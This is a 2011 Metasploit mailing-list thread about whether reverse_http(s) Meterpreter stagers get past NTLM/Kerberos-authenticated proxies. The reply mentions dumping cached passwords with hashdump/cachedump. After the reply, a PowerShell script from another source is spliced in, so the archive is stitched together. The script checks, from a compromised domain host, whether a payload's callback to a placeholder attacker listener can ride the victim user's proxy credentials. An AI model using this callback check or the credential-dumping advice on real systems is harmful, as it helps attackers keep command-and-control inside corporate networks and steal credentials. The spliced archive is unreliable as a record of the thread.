Metasploit mailing list archives
Re: New Meterpreter HTTP/HTTPS Communication
From: HD Moore <hdm () metasploit com>
Date: Wed, 29 Jun 2011 10:53:24 -0500
On 6/29/2011 10:41 AM, Matthew Presson wrote:
I just finished reading the recent post discussing the new reverse_http and reverse_https stagers, but after reading it a couple of questions popped into my head. HD mentions that: "These payloads use the WinInet API and will leverage any proxy or authentication settings the user has configured for internet access."

What if the compromised machine is joined to a domain, and the proxy servers are configured to use NTLM or Kerberos to authenticate the client? From my understanding, in these situations the user doesn't actually configure a credential set to use to authenticate to the proxy. The authentication happens behind the scenes. So, in this scenario would it still be possible to use this payload to connect back through a proxy to the attacker's machine?

And, if the proxy does use NTLM or Kerberos, wouldn't it also be prudent to harvest any tokens used during the authentication process to potentially penetrate further into the network? If possible, it would be a really nice feature to just return those tokens automatically and store them as loot.
Systems that use transparent credential passing to the proxy will pass this on to the Meterpreter payload going through these two new stagers. Keep in mind that the initial stager has to be *small* in order for it to be any use with most exploits. The reverse_https stager is only about 350 bytes before you add the callback URL.

Once you have the full Meterpreter payload loaded, you can use things like hashdump/cachedump or even upload your own tools to suck out the cached passwords. Since you typically have the token of the user running the payload already, this tends to be overkill.

-HD
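The behaviour HD describes (a WinInet client inheriting the user's proxy settings and the proxy accepting the logon session's NTLM/Kerberos credentials without any configured password) can be checked from the target before a reverse_http(s) callback is attempted. The PowerShell script below is an added example and is not part of this thread or of Metasploit; it uses the .NET System.Net classes, which read the same per-user Internet Settings (registry, PAC, WPAD) that WinInet does. The callback URL is a placeholder to be replaced with the real handler address.

```powershell
# Added example (not Metasploit code). Pre-flight check: will the logged-on
# user's proxy configuration let an HTTPS callback reach a listener using
# transparent (NTLM/Kerberos) proxy authentication, the path a WinInet-based
# reverse_http(s) stager would take?
param(
    [string]$Callback = 'https://listener.example.invalid/'   # assumption: your handler URL
)

$uri = [System.Uri]$Callback

# WebRequest.DefaultWebProxy is built from the same per-user Internet Settings
# (registry / PAC / WPAD) that WinInet reads, so it reports the proxy a
# WinInet-based stager would be routed through for this URL.
$proxy = [System.Net.WebRequest]::DefaultWebProxy
if ($proxy -and -not $proxy.IsBypassed($uri)) {
    Write-Host "Proxy for $uri : $($proxy.GetProxy($uri))"
} else {
    Write-Host "No proxy configured for $uri (direct egress)"
}

function Invoke-ProbeRequest([switch]$UseDefaultCredentials) {
    # Issue a HEAD through the configured proxy and return the HTTP status,
    # or the WebException status when no HTTP response came back at all.
    $req = [System.Net.HttpWebRequest]::Create($uri)
    $req.Method  = 'HEAD'
    $req.Timeout = 10000
    $req.Proxy   = [System.Net.WebRequest]::DefaultWebProxy
    if ($UseDefaultCredentials) {
        # Equivalent of WinInet's automatic proxy logon: answer the proxy's
        # NTLM/Negotiate challenge with the logged-on user's own credentials,
        # with no password configured anywhere.
        $req.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
    }
    try {
        $resp = $req.GetResponse()
        $code = [int]$resp.StatusCode
        $resp.Close()
        return $code
    } catch [System.Net.WebException] {
        if ($_.Exception.Response) { return [int]$_.Exception.Response.StatusCode }
        return "error: $($_.Exception.Status)"
    }
}

# First attempt carries no credentials. A 407 here means the proxy demands
# authentication, so the stager's only way out is the implicit credential
# pass-through that WinInet performs for the current logon session.
$anon = Invoke-ProbeRequest
Write-Host "Anonymous through proxy: $anon"

if ($anon -eq 407) {
    $auth = Invoke-ProbeRequest -UseDefaultCredentials
    Write-Host "With logged-on user's credentials: $auth"
    if ($auth -ne 407) {
        Write-Host "Transparent proxy auth works; a WinInet-based stager should get out."
    } else {
        Write-Host "Proxy still rejects the session credentials; expect the stager to fail here."
    }
}
```

Run it in the context of the user whose token the payload will hold (a domain user on a domain-joined host), since that is the session whose NTLM/Kerberos credentials WinInet would hand to the proxy. For an HTTPS callback the proxy answers the CONNECT request, so an "error: TrustFailure" result from the second probe is still good news: the tunnel through the proxy was established and the failure is only the listener's self-signed certificate, which the stager does not validate.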
Current thread:
- New Meterpreter HTTP/HTTPS Communication Matthew Presson (Jun 29)
- Re: New Meterpreter HTTP/HTTPS Communication HD Moore (Jun 29)
- Re: New Meterpreter HTTP/HTTPS Communication Matthew Presson (Jun 29)
- Re: New Meterpreter HTTP/HTTPS Communication HD Moore (Jun 29)